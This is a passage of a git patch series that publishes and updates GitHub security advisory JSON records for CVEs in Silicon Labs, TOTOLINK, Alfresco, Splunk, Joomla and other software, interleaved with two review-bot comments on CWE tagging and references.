From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 15:32:30 +0000 Subject: [PATCH 06/77] Publish Advisories GHSA-2m3f-m6mg-cvqf GHSA-3453-mrqq-23pm GHSA-4v8p-q39m-4pj8 GHSA-5jg4-px58-ghq6 GHSA-7cp9-3m8m-4jv3 GHSA-8fxh-mvg9-6cmm GHSA-cg7h-phwj-q3qc GHSA-j59q-24q8-ggc7 GHSA-p97j-p47c-p6g9 GHSA-pqh8-xq2x-mwg2 GHSA-qvhf-98cj-8779 GHSA-v8wf-h34r-55f7 GHSA-w8hr-79rx-368j GHSA-wc6r-7g4j-c7x4 --- .../GHSA-2m3f-m6mg-cvqf.json | 36 +++++++++++++++++++ .../GHSA-3453-mrqq-23pm.json | 6 +++- .../GHSA-4v8p-q39m-4pj8.json | 3 +- .../GHSA-5jg4-px58-ghq6.json | 15 +++++--- .../GHSA-7cp9-3m8m-4jv3.json | 36 +++++++++++++++++++ .../GHSA-8fxh-mvg9-6cmm.json | 11 ++++-- .../GHSA-cg7h-phwj-q3qc.json | 6 +++- .../GHSA-j59q-24q8-ggc7.json | 6 +++- .../GHSA-p97j-p47c-p6g9.json | 11 ++++-- .../GHSA-pqh8-xq2x-mwg2.json | 15 +++++--- .../GHSA-qvhf-98cj-8779.json | 15 +++++--- .../GHSA-v8wf-h34r-55f7.json | 36 +++++++++++++++++++ .../GHSA-w8hr-79rx-368j.json | 6 +++- .../GHSA-wc6r-7g4j-c7x4.json | 36 +++++++++++++++++++ 14 files changed, 215 insertions(+), 23 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json diff --git a/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json b/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json new file mode 100644 index 0000000000000..72ba4c94c7056 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2m3f-m6mg-cvqf/GHSA-2m3f-m6mg-cvqf.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2m3f-m6mg-cvqf", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2025-14055" + ], + "details": "An integer underflow vulnerability in Silicon Labs Secure NCP host implementation allows a buffer overread via a specially crafted packet.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14055" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/068Vm00000gvJlq" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json b/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json index c594e1d79cb1c..8426d6bf1a1b3 100644 --- a/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json +++ b/advisories/unreviewed/2026/02/GHSA-3453-mrqq-23pm/GHSA-3453-mrqq-23pm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3453-mrqq-23pm", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26337" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26337" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" 
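Review bot: In the new GHSA-2m3f-m6mg-cvqf record, `cwe_ids` holds only `CWE-125` (the over-read) although `details` names an integer underflow as the cause. The sibling Silicon Labs record GHSA-7cp9-3m8m-4jv3, created in this same patch, classifies that kind of root cause as `CWE-191`, so a search by weakness class for length-arithmetic bugs finds one record and misses the other. If the upstream CNA data allows it, `"cwe_ids": ["CWE-125", "CWE-191"]` would keep the two consistent. The CVSS v4 vector also sets `VC:N` for a bug described as an over-read, which is worth checking against the vendor bulletin rather than assuming no data exposure.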
diff --git a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json index 9197d31f0a4f7..80f86e29bfc26 100644 --- a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json +++ b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-200" + "CWE-200", + "CWE-22" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json index 45b9c46c02bb7..5d9530036ed73 100644 --- a/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json +++ b/advisories/unreviewed/2026/02/GHSA-5jg4-px58-ghq6/GHSA-5jg4-px58-ghq6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5jg4-px58-ghq6", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:13Z", "aliases": [ "CVE-2026-26736" ], "details": "TOTOLINK A3002RU_V3 V3.0.0-B20220304.1804 was discovered to contain a stack-based buffer overflow via the static_ipv6 parameter in the formIpv6Setup function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json b/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json new file mode 100644 index 0000000000000..2841be022befd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7cp9-3m8m-4jv3/GHSA-7cp9-3m8m-4jv3.json 
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7cp9-3m8m-4jv3",
+ "modified": "2026-02-20T15:31:03Z",
+ "published": "2026-02-20T15:31:03Z",
+ "aliases": [
+ "CVE-2025-14547"
+ ],
+ "details": "An integer underflow vulnerability is present in Silicon Lab’s implementation of PSA Crypto and SE Manager EC-JPAKE APIs during ZKP parsing. Triggering the underflow can lead to a hard fault, causing a temporary denial of service.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14547"
+ },
+ {
+ "type": "WEB",
+ "url": "https://community.silabs.com/068Vm00000e1UTF"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-191"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T15:20:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json b/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json
index d9d66f14eecda..fee0410af57e9 100644
--- a/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json
+++ b/advisories/unreviewed/2026/02/GHSA-8fxh-mvg9-6cmm/GHSA-8fxh-mvg9-6cmm.json
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8fxh-mvg9-6cmm", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-27094" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GoDaddy CoBlocks coblocks allows Stored XSS.This issue affects CoBlocks: from n/a through <= 3.1.16.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:28Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json b/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json index c6a51bebaadbb..ee0585d5cbe92 100644 --- a/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json +++ b/advisories/unreviewed/2026/02/GHSA-cg7h-phwj-q3qc/GHSA-cg7h-phwj-q3qc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cg7h-phwj-q3qc", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26338" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26338" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json b/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json index a7ce5ad2a37bf..9dfa933e455e0 100644 
--- a/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json +++ b/advisories/unreviewed/2026/02/GHSA-j59q-24q8-ggc7/GHSA-j59q-24q8-ggc7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j59q-24q8-ggc7", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26336" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26336" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/cve-2026-26336-unauthenticated-arbitrary-file-read-in-alfresco/ba-p/496550" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json index 4cae2aebed17e..c427f0ffc3beb 100644 --- a/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json +++ b/advisories/unreviewed/2026/02/GHSA-p97j-p47c-p6g9/GHSA-p97j-p47c-p6g9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p97j-p47c-p6g9", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-27069" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Soledad soledad allows DOM-Based XSS.This issue affects Soledad: from n/a through <= 8.7.2.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T09:16:27Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json index 558cd8091de45..6474968ed61b9 100644 --- a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json +++ b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pqh8-xq2x-mwg2", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:14Z", "aliases": [ "CVE-2026-26732" ], "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the vpnUser or vpnPassword` parameters in the formFilter function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json index 37c01fdb58dfe..85b9bfa417400 100644 --- a/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json +++ b/advisories/unreviewed/2026/02/GHSA-qvhf-98cj-8779/GHSA-qvhf-98cj-8779.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhf-98cj-8779", - "modified": "2026-02-17T21:31:14Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-17T21:31:13Z", "aliases": [ "CVE-2026-26731" ], "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer overflow via the routernamer`parameter in the formDnsv6 function.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-17T19:21:57Z" diff --git a/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json new file mode 100644 index 0000000000000..1eb7117edd702 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v8wf-h34r-55f7/GHSA-v8wf-h34r-55f7.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v8wf-h34r-55f7", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20138" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.7, 9.3.9, and 9.2.11, a user of a Splunk Search Head Cluster (SHC) deployment who holds a role with access to the Splunk `_internal` index could view the `integrationKey`, `secretKey`, and `appSecretKey` secrets, generated by [Duo Two-Factor Authentication for Splunk Enterprise](https://duo.com/docs/splunk), in plain text.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20138" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0203" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json index 0d232faec0419..d7d96e2f567ed 100644 --- a/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json +++ b/advisories/unreviewed/2026/02/GHSA-w8hr-79rx-368j/GHSA-w8hr-79rx-368j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w8hr-79rx-368j", - "modified": "2026-02-19T18:31:55Z", + "modified": "2026-02-20T15:31:00Z", "published": "2026-02-19T18:31:55Z", "aliases": [ "CVE-2026-26339" 
@@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26339" }, + { + "type": "WEB", + "url": "https://connect.hyland.com/t5/alfresco-blog/security-update-cve-2026-26337-cve-2026-26338-cve-2026-26339/ba-p/496551" + }, { "type": "WEB", "url": "https://www.hyland.com/en/solutions/products/alfresco-platform" diff --git a/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json new file mode 100644 index 0000000000000..b67e9ddb08d8c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wc6r-7g4j-c7x4/GHSA-wc6r-7g4j-c7x4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wc6r-7g4j-c7x4", + "modified": "2026-02-20T15:31:03Z", + "published": "2026-02-20T15:31:03Z", + "aliases": [ + "CVE-2026-21627" + ], + "details": "The vulnerability was rooted in how the Tassos Framework plugin handled specific AJAX requests through Joomla’s com_ajax entry point. Under certain conditions, internal framework functionality could be invoked without proper restriction.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21627" + }, + { + "type": "WEB", + "url": "https://tassos.gr" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T15:20:29Z" + } +} \ No newline at end of file From e4ed87a04b9b705750042de7749d5595b85964cb Mon Sep 17 00:00:00 2001 
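Review bot: The new GHSA-wc6r-7g4j-c7x4 record is rated `CRITICAL` but gives nothing a defender can match an installation against: `details` names no affected or fixed release, `affected` is `[]`, and the only non-NVD reference is the vendor home page `https://tassos.gr`. The past-tense wording in `details` suggests a fix has shipped, though the record does not say in which version. Pointing the `WEB` reference at the vendor's security notice, e.g. `"url": "<vendor security notice URL>"` (placeholder, not on this page), and stating the fixed version in `details` would make the entry actionable for Joomla site owners.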
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 16:45:24 +0000 Subject: [PATCH 07/77] Publish Advisories GHSA-4hg8-92x6-h2f3 GHSA-7q2j-c4q5-rm27 GHSA-7v42-g35v-xrch GHSA-8jpq-5h99-ff5r GHSA-g6q9-8fvw-f7rf GHSA-h3f9-mjwj-w476 GHSA-jrvc-8ff5-2f9f GHSA-pchc-86f6-8758 GHSA-wfqv-66vq-46rm --- .../GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json | 8 ++++++-- .../GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json | 8 ++++++-- .../GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json | 8 ++++++-- .../GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json | 8 ++++++-- .../GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json | 8 ++++++-- .../GHSA-h3f9-mjwj-w476/GHSA-h3f9-mjwj-w476.json | 8 ++++++-- .../GHSA-jrvc-8ff5-2f9f/GHSA-jrvc-8ff5-2f9f.json | 8 ++++++-- .../GHSA-pchc-86f6-8758/GHSA-pchc-86f6-8758.json | 12 ++++++++++-- .../GHSA-wfqv-66vq-46rm/GHSA-wfqv-66vq-46rm.json | 16 ++++++++++++++-- 9 files changed, 66 insertions(+), 18 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json index 3de18c6a5137c..0b9184be45e10 100644 --- a/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json +++ b/advisories/github-reviewed/2026/02/GHSA-4hg8-92x6-h2f3/GHSA-4hg8-92x6-h2f3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hg8-92x6-h2f3", - "modified": "2026-02-17T21:40:47Z", + "modified": "2026-02-20T16:44:19Z", "published": "2026-02-17T21:40:46Z", "aliases": [ "CVE-2026-26319" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hg8-92x6-h2f3" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26319" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/29b587e73cbdc941caec573facd16e87d52f007b" 
@@ -64,6 +68,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:40:46Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:24Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json index 04aca933c996c..b4eafbdedaa58 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json +++ b/advisories/github-reviewed/2026/02/GHSA-7q2j-c4q5-rm27/GHSA-7q2j-c4q5-rm27.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7q2j-c4q5-rm27", - "modified": "2026-02-17T21:41:40Z", + "modified": "2026-02-20T16:44:25Z", "published": "2026-02-17T21:41:40Z", "aliases": [ "CVE-2026-26320" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7q2j-c4q5-rm27" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26320" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/28d9dd7a772501ccc3f71457b4adfee79084fe6f" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:41:40Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json index 8366aba3562b7..1f26b40e244be 100644 --- a/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json +++ b/advisories/github-reviewed/2026/02/GHSA-7v42-g35v-xrch/GHSA-7v42-g35v-xrch.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7v42-g35v-xrch", - "modified": "2026-02-17T21:29:34Z", + "modified": "2026-02-20T16:44:04Z", "published": "2026-02-17T21:29:34Z", "aliases": [ "CVE-2026-26275" 
@@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/junkurihara/httpsig-rs/security/advisories/GHSA-7v42-g35v-xrch" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26275" + }, { "type": "WEB", "url": "https://github.com/junkurihara/httpsig-rs/pull/14" @@ -69,6 +73,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:29:34Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T22:16:46Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json index e93320993406d..652fef85408ba 100644 --- a/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json +++ b/advisories/github-reviewed/2026/02/GHSA-8jpq-5h99-ff5r/GHSA-8jpq-5h99-ff5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8jpq-5h99-ff5r", - "modified": "2026-02-17T21:41:52Z", + "modified": "2026-02-20T16:44:32Z", "published": "2026-02-17T21:41:52Z", "aliases": [ "CVE-2026-26321" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8jpq-5h99-ff5r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26321" + }, { "type": "WEB", "url": "https://github.com/openclaw/openclaw/commit/5b4121d6011a48c71e747e3c18197f180b872c5d" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-17T21:41:52Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-19T23:16:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json b/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json index c9fac9f32c3c5..a60c07bf392ff 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g6q9-8fvw-f7rf/GHSA-g6q9-8fvw-f7rf.json 
